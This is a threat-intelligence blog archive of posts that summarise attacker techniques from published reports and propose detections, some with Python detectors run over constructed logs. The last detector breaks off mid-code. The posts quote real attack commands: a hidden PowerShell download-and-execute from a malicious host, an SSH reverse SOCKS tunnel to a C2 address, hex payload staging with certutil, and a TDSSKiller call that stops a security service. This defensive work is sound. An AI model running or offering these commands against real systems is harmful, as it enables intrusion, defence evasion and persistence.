Posts

Showing posts from January, 2025

031. What's Hex Staging and How to Detect It

Hello everyone! Let's talk about the Hex Staging technique. I saw it in the Unit 42 report on CL-STA-0048. The threat actor writes hex-encoded data into a temporary file piece by piece, so no single command line carries the whole payload, and evades defenses this way. For example:

cmd.exe /c >> "path_to_temp_file" set /p="hex_encoded_data"

The trick here is that set /p prints its prompt string (the hex chunk) to stdout without a trailing newline before it reads any input, and the >> redirection appends that output to the temporary file. To decode the hex data back into a binary, the adversary leveraged certutil, for example:

cmd.exe /c certUtil -decodehex "path_to_temp_file" "path_to_decoded_file"

As you can see, detecting it is quite easy:
- Look for cmd.exe executions with "set /p=" in the arguments together with an output redirection (>> or >) to a file
- Look for certutil.exe executions with "-decodehex"

Make sure you've checked the report - there are lots of interesting techniques inside! See you tomorrow!
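Here is what the two detection ideas above look like as code, run over process-creation telemetry, plus the step a responder wants next: stitching the staged hex chunks back together to see what was decoded. This is an added example, not code from the Unit 42 report or from the original post. The telemetry records are constructed for this illustration, their field names (pid, ppid, image, cmdline) are an assumption rather than any real schema, and the regexes assume the redirection precedes set /p as in the command shown above. The certutil rule also flags -decode, the Base64 variant of the same trick.

```python
"""Detect hex staging (set /p appends + certutil decoding) over process
telemetry and reassemble the staged payload from the flagged commands.

Added example; it is not code from the Unit 42 report or from the original
post. The process-creation records below are constructed for illustration,
and their field names (pid, ppid, image, cmdline) are an assumption rather
than any real telemetry schema.
"""
import re
from collections import defaultdict

# Constructed telemetry: one operator stages a fake PE in three chunks and
# decodes it; the last record is benign noise (an interactive prompt, no
# redirection, no hex payload).
EVENTS = [
    {"pid": 41, "ppid": 7, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c >> "C:\Windows\Temp\stage.tmp" set /p="4d5a9000"'},
    {"pid": 42, "ppid": 7, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c >> "C:\Windows\Temp\stage.tmp" set /p="03000000"'},
    {"pid": 43, "ppid": 7, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c >> "C:\Windows\Temp\stage.tmp" set /p="04000000"'},
    {"pid": 44, "ppid": 7, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r'certUtil -decodehex "C:\Windows\Temp\stage.tmp" "C:\Windows\Temp\payload.exe"'},
    {"pid": 45, "ppid": 9, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c set /p name="Enter name: "'},
]

# An output redirection to a file followed by `set /p=` whose prompt is pure
# hex (8+ digits, to skip short benign prompts). set /p writes the prompt to
# stdout before reading anything, so with stdout redirected the hex lands in
# the target file.
SET_P_HEX = re.compile(
    r'>>?\s*"?(?P<target>[^"\s]+)"?.*?\bset\s+/p\s*=\s*"?(?P<hex>[0-9a-fA-F]{8,})"?',
    re.IGNORECASE)
# certutil -decodehex (hex) or -decode (Base64): both turn a staged text file
# back into a binary.
CERTUTIL_DECODE = re.compile(
    r'certutil(?:\.exe)?\b.*?-(?P<mode>decodehex|decode)\b\s+"*(?P<src>[^"\s]+)"*',
    re.IGNORECASE)


def detect(events):
    """Return (pid, rule, file) tuples for every command that matches a rule."""
    alerts = []
    for ev in events:
        cmd = ev["cmdline"]
        m = SET_P_HEX.search(cmd)
        if m:
            alerts.append((ev["pid"], "hex_staging_set_p", m.group("target")))
        m = CERTUTIL_DECODE.search(cmd)
        if m:
            alerts.append((ev["pid"], "certutil_" + m.group("mode").lower(), m.group("src")))
    return alerts


def reassemble(events):
    """Concatenate the hex chunks per target file, in telemetry order, and
    decode them the way certutil -decodehex would. A truncated final chunk
    (odd hex length) cannot be decoded and is reported as None."""
    staged = defaultdict(str)
    for ev in events:
        m = SET_P_HEX.search(ev["cmdline"])
        if m:
            staged[m.group("target").lower()] += m.group("hex")
    result = {}
    for path, hexdata in staged.items():
        result[path] = bytes.fromhex(hexdata) if len(hexdata) % 2 == 0 else None
    return result


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
    for path, blob in reassemble(EVENTS).items():
        print(path, blob[:2] if blob else "incomplete")
```

Reassembling from command lines only works if your telemetry keeps full command lines and the chunks arrive in order; the MZ header at the start of the rebuilt file is the quick confirmation that a PE was staged.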

030. Ransomware Gangs Use SSH Tunneling for Stealthy Persistence in VMware ESXi infrastructure

Hello everyone! Recently Sygnia shared their insights on how ransomware gangs abuse SSH on VMware ESXi hosts for stealthy persistence and how to investigate such activity. To create a tunnel, the threat actors may use the SSH binary already present on the hypervisor:

ssh -fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>

Here -f sends ssh to the background, -N opens no remote shell, and -R with a port but no destination turns the session into reverse dynamic forwarding: a SOCKS proxy listening on the C2 server that routes traffic back into the victim network through the ESXi host. From the incident response and forensics point of view, the following log files are the most interesting:
- /var/log/shell.log (commands typed in the ESXi shell)
- /var/log/hostd.log (host agent events, including SSH service state changes)
- /var/log/auth.log (SSH authentication attempts)
- /var/log/vobd.log (VMkernel observation events, including firewall changes)

Analysis of these files allows you to uncover lots of interesting events, for example, enabling of SSH access, disabling of firewall rules, SSH authentication into ESXi, etc. So, if you deal with modern ransomware attacks, being familiar with ESXi forensics is a must! See you tomorrow!
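A small triage script that pulls exactly those events out of the log files listed above and puts them on one timeline, as an added example that is not code from Sygnia's report or from the original post. The log lines are constructed and only approximate the ESXi syslog layout (ISO timestamp, facility, process, message); treat the exact format of each file as an assumption to check against your own ESXi build.

```python
"""Triage ESXi logs for the SSH-tunnel persistence pattern: SSH enabled,
firewall disabled, root SSH logins from outside the admin network, and an
ssh reverse (SOCKS) forward launched from the ESXi shell.

Added example; it is not code from Sygnia's report or from the original post.
The log lines are constructed and only approximate the ESXi syslog layout
(ISO timestamp, facility, process, then message); the exact format of each
file is an assumption to check against your own ESXi build.
"""
import re

SAMPLE_LOGS = {
    "/var/log/hostd.log": [
        "2025-01-20T10:14:30.001Z In(166) Hostd[2099001]: [Originator@6876 sub=Vimsvc.ha-eventmgr] "
        "Event 120 : SSH access has been enabled.",
    ],
    "/var/log/auth.log": [
        "2025-01-20T10:14:55.412Z In(38) sshd[2100010]: Accepted keyboard-interactive/pam for root "
        "from 203.0.113.5 port 51234 ssh2",
        "2025-01-20T11:02:13.007Z In(38) sshd[2100300]: Accepted keyboard-interactive/pam for root "
        "from 10.0.0.15 port 60021 ssh2",
    ],
    "/var/log/shell.log": [
        "2025-01-20T10:15:03.120Z In(14) shell[2100045]: [root]: esxcli network firewall set --enabled false",
        "2025-01-20T10:15:40.550Z In(14) shell[2100045]: [root]: ssh -fN -R 127.0.0.1:1080 user@198.51.100.7",
        "2025-01-20T10:16:02.000Z In(14) shell[2100045]: [root]: esxcli system version get",
    ],
}

TIMESTAMP = re.compile(r"^(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(?:\.\d+)?Z)")

RULES = [
    ("ssh_enabled", re.compile(
        r"SSH access has been enabled|vim-cmd\s+hostsvc/enable_ssh|/etc/init\.d/SSH\s+start", re.I)),
    ("firewall_disabled", re.compile(
        r"esxcli\s+network\s+firewall\s+set\s+--enabled\s+false", re.I)),
    # `ssh ... -R <port>` with no destination is reverse dynamic (SOCKS) forwarding.
    ("reverse_tunnel", re.compile(r"\bssh\b.*\s-R\s+\S+", re.I)),
    ("ssh_root_login", re.compile(
        r"Accepted\s+\S+\s+for\s+root\s+from\s+(?P<ip>\S+)", re.I)),
]


def triage(logs, admin_nets=("10.0.0.",)):
    """Return (timestamp, file, rule, line) hits sorted into one timeline.

    Root logins from the expected management prefixes are dropped; everything
    else that matches a rule is kept."""
    hits = []
    for path, lines in logs.items():
        for line in lines:
            ts = TIMESTAMP.match(line)
            stamp = ts.group(1) if ts else ""
            for rule, rx in RULES:
                m = rx.search(line)
                if not m:
                    continue
                if rule == "ssh_root_login" and m.group("ip").startswith(admin_nets):
                    continue
                hits.append((stamp, path, rule, line))
    return sorted(hits)


if __name__ == "__main__":
    for stamp, path, rule, line in triage(SAMPLE_LOGS):
        print(f"{stamp} {rule:18} {path}: {line.split(']: ', 1)[-1]}")
```

The ordering is the point: SSH enabled, then a root login from an unexpected address, then the firewall going down, then the tunnel, all within two minutes, is a sequence no administrator produces by accident. Feed it the real files (one list of lines per path) and widen admin_nets to your management ranges.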

029. Babuk or not Babuk?

Hello everyone! Recently I saw a tweet claiming the infamous ransomware group Babuk is back. I can hardly believe it's true; most likely it's another imposter. In one of the SANS Threat Analysis Rundown episodes we discussed how leaked ransomware source code is lowering the bar for adversaries, so I decided to share it with you today: See you tomorrow!

028. SANS Cyber Threat Intelligence Summit 2025: My Picks (Day 2)

Hello everyone! I hope you're enjoying the summit! Today I decided to share my picks for day 2! Mental health is extremely important, so I'll definitely attend the keynote:

Your Mental Health & Well-Being: Combating the Adversaries of Stress & Burnout in Cybersecurity

Clustering is always a hot topic, so this talk is also on my must-attend list:

What a Cluster - A Case Study in Threat Actor Collaboration and Framework for Comparative Attribution

The following talk also looks interesting enough for me:

Sales And Marketing Are Threat Actors, Too

Again, I'm planning to attend most of the talks, but these caught my eye first. See you tomorrow!

027. SANS Cyber Threat Intelligence Summit 2025: My Picks (Day 1)

Hello everyone! Today is the first day of the SANS Cyber Threat Intelligence Summit 2025. So I decided to highlight the talks I want to attend most. I always enjoy ransomware-related talks, so I'll definitely attend the following:

Ransomware Syndicates: Cartels or Twisted Tech Unicorns?
Dissecting the Cicada - In the shadow of the Black Cat

As you already know, I enjoy detection engineering as well, so the following talk is also on my list:

From Threat Intelligence to Detection Engineering: A Case Study on Identifying Gaps in Detection and Enhancing CTI Value for the Organization

It's not always possible or easy to split multiple kill chains during an incident response engagement, so this talk seems very interesting to me as well:

Advanced Threat Research Methodologies: Unraveling a Triple-APT Intrusion

It doesn't mean other talks are not interesting, I plan to attend all of them, but these four caught my eye. Hope you'll enjoy the summit too! See you tomorrow!

026. Threat Actors Abuse Printui.exe for DLL Search Order Hijacking

Hello everyone! In some cases even threat actors involved in cryptomining malware distribution leverage quite curious techniques. Today we'll look at an activity cluster colleagues from Red Canary track as Tangerine Turkey (I like their taxonomy as well; hi Katie and team :)). So, it's a worm, it's delivered via USB (yes, again), and it abuses printui.exe to run a cryptominer. Let's look at how it works. Once the victim opens a malicious LNK file on an infected USB drive, wscript.exe executes a script. Look for suspicious VBS file executions from USB drives, for example:

WScript.exe "D:\rootdir\x455198.vbs"

The script executes a BAT file from the same location. This file creates a new folder whose name carries a trailing space, which the \\?\ prefix allows ( mkdir "\\?\C:\Windows \System32" ), abuses xcopy to copy printui.exe into it ( xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y ), and copies a malicious DAT file there as well ( xcopy "x805299.dat" "%SystemDrive%\Windows \System32...

025. Silent Lynx Campaign: Detection Opportunities

Hello everyone! Today we're going to talk about an activity cluster which researchers from Seqrite named Silent Lynx. It's also known as YoroTrooper and SturgeonPhisher, and according to Cisco Talos it has a Kazakhstan origin. BI.ZONE Threat Intelligence team tracks this cluster under the name Cavalry Werewolf. Seqrite researchers uncovered two campaigns:
- RAR archives with malicious ISO files. These files contained decoy documents and C++ loaders.
- RAR archives with decoy documents and a Golang reverse shell.

As always, let's look at detection and hunting opportunities. First, the ISO files used here are very small, which is uncommon for legitimate disk images:
- Look for small ISO files with executable contents
- Look for small ISO files in Downloads, Documents and Desktop folders

Next thing, the loader used PowerShell to communicate with the Telegram API, receive and run commands, and send back the output or errors:
- Look for PowerShell execution with -NoProfile -ExecutionPolicy Bypass -e and long Base64...

024. PlushDaemon Supply-Chain Attack: Detection Opportunities

Hello everyone! Recently ESET published a report on a supply-chain attack against a VPN provider in South Korea. The group behind the attack is named PlushDaemon. Despite the fact that supply-chain attacks are quite hard to detect, we always have lots and lots of detection opportunities for post-exploitation! Let's look at some of them. The adversary abused the legitimate regcap.exe utility (included in Visual Studio) to side-load a malicious DLL, lregdll.dll. The utility was renamed to PerfWatson.exe. So, what to look for?
- Renamed regcap.exe execution from suspicious locations, for example, subfolders of %PUBLIC% (PE metadata such as the original file name will help you)
- Loading of DLLs from suspicious locations, often the same folder as the binary used for side-loading

Next thing - persistence. The adversary used less common mechanisms, so it's also quite easy to detect:
- Look for Userinit entry modifications under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon registry...

023. Detecting a Gamaredon Copycat

Hello everyone! Recently Knownsec 404 Team released a report on an activity cluster we track as Core Werewolf. The cluster is quite active and uses simple but effective methods. In most cases they rely on legitimate remote access software - UltraVNC. At the same time, the installation routine is very noisy, so let's talk about detection and hunting opportunities! As I mentioned already, the adversary leveraged UltraVNC, but it's always renamed. We can use this together with typical command line arguments to build a pseudo-detector:

process_name != "WinVNC.exe" && command_line_includes : ("-autoreconnect" && "-connect") && process_pe_original_file_name == "WinVNC.exe"

Another example: the threat actors abused taskkill to stop the process. Again, we can use this information to build another pseudo-detector:

process_name == "taskkill.exe" && command_line_includes : ("/f" && "/im") ...

022. That's How FIN7 Uses Malicious JAR Files

Hello everyone! Yesterday we talked about malicious JAR files. And guess what? I just ran into a fresh report from the Sophos MDR team - they show how the notorious FIN7 uses such files. Let's start with how these files were delivered to the compromised system - it's also very interesting. First, the adversary sent a large volume of spam messages (over 3000). Shortly after, the victim received a Teams call. The threat actor impersonated a help desk specialist and asked to allow a remote screen control session through Teams, then used this session to drop malicious files onto the compromised system. And yes, the first stage is a JAR file, which was executed through the same remote session:

C:\Users\Public\Documents\MailQueue-Handler\jdk-23.0.1\bin\javaw.exe -jar C:\Users\Public\Documents\MailQueue-Handler\MailQueue-Handler.jar

Note the JDK dropped under C:\Users\Public\Documents: a Java runtime in a user-writable folder is a detection opportunity on its own. Another malicious JAR file leveraged by the threat actors is a credential harvester:

"C:\Users\Public\Documents\MailQueue-Handler\jdk-23.0.1\bin\javaw.exe" -jar C:\Use...

021. Do You Think This Java.exe is Legitimate?

Hello everyone! Today we're going to talk about malicious JAR files and look at an activity cluster we track as Bloody Wolf, which mostly targets Kazakhstan. So, this cluster leverages phishing emails to deliver PDF documents which contain links to malicious JAR files. Interestingly enough, such PDF files even have instructions on how to download and install Java. One may think that adversaries won't compromise anybody using such an approach. And would be wrong. A recent campaign we tracked led to hundreds of systems being compromised! Ok, let's look at some detection opportunities:
- Execution of JAR files from unexpected locations using java.exe -jar
- Creation of scheduled tasks for JAR files with schtasks
- Network connections to pastebin[.]com initiated by JAR files

These are just a few examples, there are more, of course! Spotted it? Share in the comments section! See you tomorrow!

020. Play Ransomware Gang's Reconnaissance Tool Looks Like Legitimate Security Software

Hello everyone! Field Effect presented a report on Grixba - a notorious reconnaissance tool used by Play ransomware affiliates. The tool allows adversaries to collect information about remote systems, installed software (including security, backup and remote access software), browser history, processes, network, etc. An interesting thing about this version of the tool - it's designed to look like a SentinelOne Compatibility Wizard! At the same time, it's not signed, and that gives us a good detection opportunity: unsigned binaries carrying a security vendor's name in their metadata. It's not the first time Play ransomware affiliates used Grixba masqueraded like this. Trend Micro also spotted a similar version of the tool during one of their incident response engagements. Reconnaissance tools and techniques are extremely common, so it's a great point to focus on to stop attacks at early stages. See you tomorrow!

019. Here's Another Rootkit Remover Commonly Abused by Threat Actors

Hello everyone! One of my blog readers, Jefferson, suggested blogging about another tool commonly abused to disable AV and EDR - GMER. Back in the day, we even used it during incident response engagements, but nowadays it's commonly abused by various ransomware gangs, for example, BlackSuit. Despite the fact that activity related to GMER may be legitimate, it's good to have proper detections and respond accordingly, as it may be a ransomware precursor! So, here are some detection opportunities:
- Dropping SYS files with metadata related to GMER: "GMER", "gmer.sys", etc.
- Creating a service for the aforementioned SYS file
- GMER execution with the -killfile option

At the same time, GMER is detected quite well by many antivirus engines. What does it mean? The most important thing - to respond properly! See you tomorrow!

018. That's How Real Adversaries Abuse Wksprt.exe and Use DLL Proxying

Hello everyone! Cyble shared research on a recent campaign targeting organizations in Germany. Two things caught my attention - abusing wksprt.exe (RemoteApp and Desktop Connection Runtime) for sideloading and using DLL proxying. Interestingly enough, the threat actors copied this legitimate file from the compromised system to a newly created folder using xcopy:

xcopy /Y /I C:\Windows\System32\wksprt.exe "C:\Users\<USER>\AppData\Local\InteI\"

(Note the folder name, InteI, which mimics Intel.) This legitimate executable is used to sideload a malicious DLL (IPHLPAPI.dll), which in turn loads the renamed legitimate DLL (IPHLPLAPI.dll), both from the same folder. The malicious DLL acts as a proxy and forwards function calls to the legitimate DLL, so wksprt.exe keeps working normally. At the same time, the malicious DLL reads the contents of the file ccache.dat to decrypt the shellcode and retrieve the final payload - a Sliver implant. Despite the fact that the adversary leverages quite sophisticated techniques like DLL proxying, the infection process is extremely noisy, fo...

017. Star Blizzard and Stolen WhatsApp accounts

Hello everyone! Yesterday the Microsoft Threat Intelligence team shared some information on a Star Blizzard campaign targeting WhatsApp accounts. So, the adversary sends a phishing email with a quick response (QR) code purporting to direct users to join a WhatsApp group (Microsoft's post shows an example of such a phishing email). But the QR code is not valid, so if the victim responds with an email, the threat actors send another message, this time with a link which leads to a phishing page with instructions on how to "join the group". The QR code on that page is a WhatsApp "link a device" code: scanning it connects the victim's account to a linked device and/or the WhatsApp Web portal controlled by the adversary, who can then exfiltrate messages. Here are the indicators of compromise presented by Microsoft:
- civilstructgeo[.]org
- aerofluidthermo[.]org

See you tomorrow!

016. Good and Bad USB Drives

Hello everyone! French authorities and the FBI removed PlugX malware from more than 4,200 compromised devices. So, let's talk a bit about a not so common initial access technique leveraged by one of the groups operating it. Yes, I'm talking about Mustang Panda (Horned Werewolf or Twill Typhoon) again. We are already used to phishing emails, exploiting public-facing applications, abusing external remote services and even supply-chain attacks. But what about USB drives? Yes, that's one of the ways the activity cluster mentioned above distributed this PlugX variant. Once a USB drive is inserted into an infected computer, the malware creates a hidden folder structure and copies PlugX components to it. It also creates an LNK file pointing to a legitimate executable used for side-loading. Details on the infection process can be found, for example, in this report. Ok, what to look for? For example:
- Executions from USB drives, especially from suspicious locations, like the RECYCLER.BIN folder ...

015. Threat Actors Can Abuse Even This Kind of Software

Hello everyone! A recent Unit 42 notification reminded me about VERY curious legitimate software abused by adversaries. It's BOINC, or Berkeley Open Infrastructure for Network Computing - open-source software that allows users to contribute computing power to scientific research projects focused on solving complex calculations. The infection process is interesting as well. The victim is redirected to a malicious website with fake checks and is instructed to paste and run a PowerShell script:

powershell -WindowStyle Hidden $global:block=curl -useb hxxp[:]//lggknhaffleahbh[.]top/1.php?s=527;iex $global:block.content

Here curl is the Windows PowerShell alias for Invoke-WebRequest, -useb is the abbreviated -UseBasicParsing switch, and iex (Invoke-Expression) runs whatever the server returned. The script leads to the installation of a BOINC client. Why does the adversary use BOINC? It can collect information and send tasks to the host for execution! So, what to look for? Here are a few detection and hunting tips:
- Look for renamed BOINC executables
- Look for executables with metadata related to BOINC, for example: "BOINC Client", "boinc.exe", etc.

See you...

014. Encrypting S3 Buckets Abusing Native AWS Services

Hello everyone! Let's talk a bit about the cloud. Yes, such services are also affected by ransomware. For example, this report by Halcyon demonstrates how adversaries abuse native AWS services to encrypt S3 buckets. The threat actor named Codefinger leveraged compromised AWS keys to start the encryption process using server-side encryption with customer-provided keys (SSE-C): the attacker supplies their own AES-256 key through the x-amz-server-side-encryption-customer-algorithm and related request headers, and S3 encrypts the objects with it. As only an HMAC of the key is logged in AWS CloudTrail, the key cannot be recovered from the logs and the data cannot be decrypted without the attacker's key. The adversary also abused the S3 Object Lifecycle Management API to mark files for deletion within 7 days. This case once again shows the importance of reviewing and monitoring AWS keys, as well as implementing advanced logging capabilities (such as S3 data events) in order to detect unusual activity. See you tomorrow!
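What that looks like as a CloudTrail hunt, as an added example that is not code from Halcyon's report or from the original post: group events by access key, flag object writes made with SSE-C, and correlate them with a lifecycle rule that expires objects within days. The records are constructed and only approximate CloudTrail's layout; the fields relied on (eventName, additionalEventData.SSEApplied, the SSE-C request header inside requestParameters, and requestParameters.LifecycleConfiguration) are assumptions to verify against your own trails.

```python
"""Hunt CloudTrail for the Codefinger pattern: objects rewritten with SSE-C
(customer-provided keys) and, from the same access key, a lifecycle rule
that expires the bucket's objects within days.

Added example; it is not code from Halcyon's report or from the original
post. The records are constructed and only approximate CloudTrail's layout;
the fields relied on (eventName, additionalEventData.SSEApplied, the SSE-C
request header in requestParameters, requestParameters.LifecycleConfiguration)
are assumptions to verify against your own trails.
"""
from collections import defaultdict

SSE_C_HEADER = "x-amz-server-side-encryption-customer-algorithm"
WRITE_EVENTS = ("PutObject", "CopyObject")
LIFECYCLE_EVENTS = ("PutBucketLifecycle", "PutBucketLifecycleConfiguration")
MAX_EXPIRATION_DAYS = 30  # anything shorter on a data bucket deserves a look

RECORDS = [
    {"eventTime": "2025-01-10T03:12:44Z", "eventName": "CopyObject",
     "userIdentity": {"accessKeyId": "AKIAEXAMPLE1234"},
     "requestParameters": {"bucketName": "corp-data", "key": "q4/report.xlsx",
                           SSE_C_HEADER: "AES256"},
     "additionalEventData": {"SSEApplied": "SSE_C"}},
    {"eventTime": "2025-01-10T03:12:45Z", "eventName": "CopyObject",
     "userIdentity": {"accessKeyId": "AKIAEXAMPLE1234"},
     "requestParameters": {"bucketName": "corp-data", "key": "q4/ledger.csv",
                           SSE_C_HEADER: "AES256"},
     "additionalEventData": {"SSEApplied": "SSE_C"}},
    {"eventTime": "2025-01-10T03:13:10Z", "eventName": "PutBucketLifecycle",
     "userIdentity": {"accessKeyId": "AKIAEXAMPLE1234"},
     "requestParameters": {"bucketName": "corp-data",
                           "LifecycleConfiguration": {"Rule": {"Status": "Enabled",
                                                               "Expiration": {"Days": 7}}}}},
    # Benign: ordinary SSE-KMS upload by another principal.
    {"eventTime": "2025-01-10T09:00:00Z", "eventName": "PutObject",
     "userIdentity": {"accessKeyId": "AKIAEXAMPLE9999"},
     "requestParameters": {"bucketName": "corp-data", "key": "q4/new.csv"},
     "additionalEventData": {"SSEApplied": "SSE_KMS"}},
]


def is_sse_c(rec):
    """True if the object was written with a customer-provided key."""
    if rec.get("additionalEventData", {}).get("SSEApplied") == "SSE_C":
        return True
    return SSE_C_HEADER in rec.get("requestParameters", {})


def short_expiration(rec):
    """Smallest enabled Expiration.Days at or under the threshold, else None."""
    if rec.get("eventName") not in LIFECYCLE_EVENTS:
        return None
    rules = rec.get("requestParameters", {}).get("LifecycleConfiguration", {}).get("Rule", [])
    if isinstance(rules, dict):  # a single rule is logged as an object, not a list
        rules = [rules]
    days = [r.get("Expiration", {}).get("Days") for r in rules if r.get("Status") == "Enabled"]
    days = [d for d in days if isinstance(d, int) and d <= MAX_EXPIRATION_DAYS]
    return min(days) if days else None


def hunt(records):
    """Per access key: SSE-C object writes and any short expiration it set.
    Only keys that did both are returned."""
    by_key = defaultdict(lambda: {"sse_c_objects": [], "expiration_days": None, "buckets": set()})
    for rec in records:
        key = rec.get("userIdentity", {}).get("accessKeyId", "?")
        params = rec.get("requestParameters", {})
        if rec.get("eventName") in WRITE_EVENTS and is_sse_c(rec):
            by_key[key]["sse_c_objects"].append(params.get("key"))
            by_key[key]["buckets"].add(params.get("bucketName"))
        days = short_expiration(rec)
        if days is not None:
            by_key[key]["expiration_days"] = days
            by_key[key]["buckets"].add(params.get("bucketName"))
    return {k: v for k, v in by_key.items()
            if v["sse_c_objects"] and v["expiration_days"] is not None}


if __name__ == "__main__":
    for key, info in hunt(RECORDS).items():
        print(key, sorted(info["buckets"]), len(info["sse_c_objects"]), "objects,",
              "expires in", info["expiration_days"], "days")
```

Two caveats: PutObject and CopyObject only reach CloudTrail if S3 data events are enabled for the bucket, so turn them on before you need them; and a burst of SSE-C copies from a key that never used SSE-C before is worth an alert on its own, the lifecycle correlation just raises confidence.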

013. It Can Remove Rootkits. And Your EDR!

Hello everyone! Let's talk about another very curious tool abused by threat actors. For example, it was used by LockBit and RansomHub ransomware affiliates. Guessed it already? Yes, I'm talking about TDSSKiller - a legitimate rootkit removal tool by Kaspersky. Despite the fact that it was developed for malware removal, it can also be used by an adversary to remove security software. For example, here's how RansomHub affiliates used it to disable a Trend Micro service according to this report:

C:\Windows\tdsskiller.exe -dcsvc "TMBMServer" -accepteula

By the way, according to VirusTotal, this tool isn't detected by many antivirus engines. Still, we have a few detection and hunting opportunities, for example:
- Command line parameters typical for the tool: -dcsvc
- Metadata indicating the executable is TDSSKiller: "TDSSKiller", "TDSS rootkit removing tool"

Do you know any other curious legitimate tools used to disable EDR? See you tomorrow!
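The pseudo-detectors in posts 023 (renamed UltraVNC), 019 (GMER with -killfile), 015 (renamed BOINC) and 013 (TDSSKiller with -dcsvc) all rest on the same idea: match the tool by its PE metadata rather than by the name the adversary gave it, then alert on a rename or on abuse-typical arguments. One detector that covers all four, as an added example that is not code from any of the cited reports or the original posts. Events are constructed; the field names follow Sysmon Event ID 1 (Image, OriginalFileName, Description, CommandLine), but the records themselves are an assumption.

```python
"""Flag legitimate tools that are renamed or run with abuse-typical arguments,
matching on PE metadata (original file name, description) rather than the
process name the adversary chose.

Added example covering the pseudo-detectors in posts 023 (UltraVNC), 019
(GMER), 015 (BOINC) and 013 (TDSSKiller); it is not code from any of the cited
reports or from the original posts. Events are constructed; the field names
follow Sysmon Event ID 1 (Image, OriginalFileName, Description, CommandLine),
but the records are an assumption.
"""
import ntpath
import re

# Metadata that identifies each tool and, where the posts name them, the
# arguments typical of its abuse. BOINC has none: the rename alone is the signal.
WATCHLIST = {
    "ultravnc": {"original": {"winvnc.exe"}, "keywords": ("ultravnc", "winvnc"),
                 "args": re.compile(r"-autoreconnect\b.*-connect\b|-connect\b.*-autoreconnect\b", re.I)},
    "gmer": {"original": {"gmer.exe"}, "keywords": ("gmer",),
             "args": re.compile(r"-killfile\b", re.I)},
    "tdsskiller": {"original": {"tdsskiller.exe"}, "keywords": ("tdsskiller", "tdss rootkit"),
                   "args": re.compile(r"-dcsvc\b", re.I)},
    "boinc": {"original": {"boinc.exe"}, "keywords": ("boinc",), "args": None},
}

EVENTS = [
    {"Image": r"C:\Users\Public\svchost.exe", "OriginalFileName": "WinVNC.exe",
     "Description": "UltraVNC Server",
     "CommandLine": "svchost.exe -autoreconnect -connect 198.51.100.20:5500"},
    {"Image": r"C:\Windows\tdsskiller.exe", "OriginalFileName": "tdsskiller.exe",
     "Description": "TDSS rootkit removing tool",
     "CommandLine": 'tdsskiller.exe -dcsvc "TMBMServer" -accepteula'},
    {"Image": r"C:\ProgramData\upd\rkcheck.exe", "OriginalFileName": "gmer.exe",
     "Description": "GMER",
     "CommandLine": r"rkcheck.exe -killfile C:\Program Files\EDR\edr.sys"},
    {"Image": r"C:\ProgramData\svc\host.exe", "OriginalFileName": "boinc.exe",
     "Description": "BOINC client", "CommandLine": "host.exe --daemon"},
    # Benign: UltraVNC under its own name with ordinary service arguments.
    {"Image": r"C:\Program Files\uvnc bvba\UltraVNC\winvnc.exe", "OriginalFileName": "WinVNC.exe",
     "Description": "UltraVNC Server", "CommandLine": "winvnc.exe -service"},
]


def classify(event):
    """Return (tool, reasons). tool is None if no watched tool matches;
    an empty reasons list means the tool ran under its own name with
    ordinary arguments."""
    original = event.get("OriginalFileName", "").lower()
    description = event.get("Description", "").lower()
    name = ntpath.basename(event.get("Image", "")).lower()
    for tool, spec in WATCHLIST.items():
        by_name = original in spec["original"]
        by_desc = any(k in description for k in spec["keywords"])
        if not (by_name or by_desc):
            continue
        reasons = []
        if original and name != original:
            reasons.append(f"renamed: {name} != {original}")
        if spec["args"] and spec["args"].search(event.get("CommandLine", "")):
            reasons.append("abuse arguments")
        return tool, reasons
    return None, []


def detect(events):
    """Alerts as (Image, tool, reasons) for every event with at least one reason."""
    alerts = []
    for event in events:
        tool, reasons = classify(event)
        if tool and reasons:
            alerts.append((event["Image"], tool, reasons))
    return alerts


if __name__ == "__main__":
    for image, tool, reasons in detect(EVENTS):
        print(f"{tool:10} {image}  ->  {'; '.join(reasons)}")
```

The benign UltraVNC service run produces no alert because it is neither renamed nor started with the -autoreconnect/-connect pair; a rename alone (the BOINC case) still fires, which is the right default for tools with no business being renamed.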

012. They Want to Know Everything About Your System!

Hello everyone! Today we'll look at reconnaissance techniques leveraged by Secret Blizzard (also known as Turla) as seen in the report by Microsoft Threat Intelligence. In this campaign Secret Blizzard used the Amadey bot to download its own backdoors to specifically selected target devices associated with the Ukrainian military. So, one of the batch scripts leveraged by the adversary invoked lots of reconnaissance commands. Let's look at each of them:
- ver - to collect information about the OS version;
- systeminfo - to collect compromised system information;
- ipconfig /all - to collect the full TCP/IP configuration for all adapters;
- ipconfig /displaydns - to collect the contents of the DNS client resolver cache;
- route print - to collect the entries in the local IP routing table;
- arp -a - to collect the current ARP cache tables for all interfaces;
- netstat -a -n - to collect information on active network connections;
- net share - to collect information on ...
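None of these commands is suspicious on its own; what gives the script away is a single parent spawning many different discovery commands within seconds. The aggregation below implements that, as an added example that is not code from Microsoft's report or from the original post. The events are constructed and their schema (ts, host, ppid, cmdline) is an assumption. Note that ver is a cmd.exe built-in and never shows up as a child process, only in script content or command-line logging, so the sample relies on the external binaries.

```python
"""Detect a reconnaissance burst: several distinct discovery commands spawned
by one parent process within a short window, as the batch script above does.

Added example; it is not code from Microsoft's report or from the original
post. The events are constructed, and the schema (ts, host, ppid, cmdline) is
an assumption. ver is a cmd.exe built-in and never appears as a child process,
only in script content or command-line logging, so the sample below relies on
the external binaries.
"""
import ntpath
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery commands from the post, keyed by a normalised label.
RECON = [
    ("ver", re.compile(r"^ver\b", re.I)),
    ("systeminfo", re.compile(r"^systeminfo\b", re.I)),
    ("ipconfig /all", re.compile(r"^ipconfig\s+/all\b", re.I)),
    ("ipconfig /displaydns", re.compile(r"^ipconfig\s+/displaydns\b", re.I)),
    ("route print", re.compile(r"^route\s+print\b", re.I)),
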